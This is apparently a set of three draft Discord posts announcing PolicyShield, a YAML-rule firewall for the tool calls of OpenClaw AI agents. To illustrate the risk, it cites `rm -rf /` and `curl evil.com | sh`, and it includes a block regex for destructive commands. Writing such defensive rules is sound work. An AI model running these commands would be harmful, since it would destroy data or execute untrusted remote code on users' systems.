====================================================================
DISCORD — OpenClaw community channel
====================================================================

VARIANT 1 (recommended):
-------------------------

Hey everyone! �

I built **PolicyShield** — a runtime firewall that plugs into OpenClaw as a sidecar. Every tool call gets checked against YAML rules before execution.

The problem: your agent can run `rm -rf /`, leak your `.env`, or `curl evil.com | sh` — and the only thing stopping it is the LLM's "politeness."

PolicyShield fixes that. Setup:
```
pip install policyshield[server]
policyshield openclaw setup
```

Two commands — 11 security rules kick in automatically. Block destructive commands, redact PII, require human approval for sensitive ops, rate limit exec calls.

**The proof:** I set rules that block `cat` (a harmless command) and asked the agent to run `cat /etc/hosts`. It refused. No LLM would refuse that on its own — that's PolicyShield enforcing the block.

```yaml
- id: block-destructive-exec
  when:
    tool: exec
    args_match:
      command:
        regex: \b(rm\s+-rf|mkfs|dd\s+if=)\b
  then: block
```

Also includes: kill switch, hot reload, Telegram approvals, full audit trail. 1,200+ tests, MIT license.

🔗 https://github.com/mishabar410/PolicyShield

Would love to hear your feedback!


VARIANT 2 (shorter):
---------------------

Hey! �

Sharing something I built — **PolicyShield**, a runtime firewall for OpenClaw agents.

Every tool call passes through YAML policy rules before execution. Blocks `rm -rf`, redacts PII, requires approval for `.env` writes, rate limits exec calls — 11 rules out of the box.

```
pip install policyshield[server]
policyshield openclaw setup
```

To prove it works, I made demo rules that block `cat /etc/hosts` — a completely harmless command no LLM would refuse on its own. With PolicyShield — blocked. That's the point.

MIT license, 1,200+ tests, kill switch, hot reload, Telegram approvals.

🔗 https://github.com/mishabar410/PolicyShield

Feedback welcome 🙏


VARIANT 3 (ultra-short):
-------------------------

Hey all! 👋

Built a runtime firewall for OpenClaw — **PolicyShield**.

Two commands to set up, 11 YAML security rules out of the box. Blocks destructive commands, redacts PII, adds human approval for sensitive ops.

Proved it works by blocking `cat /etc/hosts` — no LLM would refuse that on its own.

🔗 https://github.com/mishabar410/PolicyShield
